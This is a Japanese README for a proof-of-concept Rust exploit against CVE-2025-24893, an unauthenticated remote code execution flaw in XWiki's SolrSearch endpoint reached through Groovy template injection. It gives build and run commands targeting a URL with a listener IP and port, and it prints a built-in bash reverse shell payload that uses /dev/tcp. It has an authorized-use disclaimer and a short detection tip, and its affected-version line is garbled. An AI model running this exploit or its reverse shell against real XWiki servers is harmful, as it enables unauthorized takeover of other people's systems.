
CVE-2025-24893 の Proof-of-Concept エクスプロイト。これは XWiki における未認証のリモートコード実行 (RCE) 脆弱性です。Groovy スクリプト実行を介して SolrSearch エンドポイントのテンプレートインジェクションの欠陥を悪用します。
CVE-2025-24893 の概念実証エクスプロイトです。XWiki における重大な未認証リモートコード実行(RCE) 脆弱性です。
このエクスプロイトは SolrSearch エンドポイントのGroovyテンプレートインジェクションを悪用し、認証なしで任意のコマンド(リバースシェルを含む)を実行します。
XWikiが SolrSearch RSSエンドポイントへの細工された入力を処理する方法に欠陥があり、攻撃者がレンダリングパイプラインにGroovyコードを注入できます。
これにより、{{groovy}} スクリプトブロックを介した未認証RCE が可能になります。
< 15.10.11>= 16.0.0 かつ < 16.4.115.10.1116.4.1リリースをダウンロード:
またはソースからビルド:
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444
以下の形式のビルトインリバースシェルペイロードがあります:
bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1
このコードは教育および許可されたセキュリティ研究のみを目的としています。 所有していない、または明示的なテスト許可を得ていないシステムに対してこのエクスプロイトを使用しないでください。
/bin/get/Main/SolrSearch?media=rss の不審な使用を監視する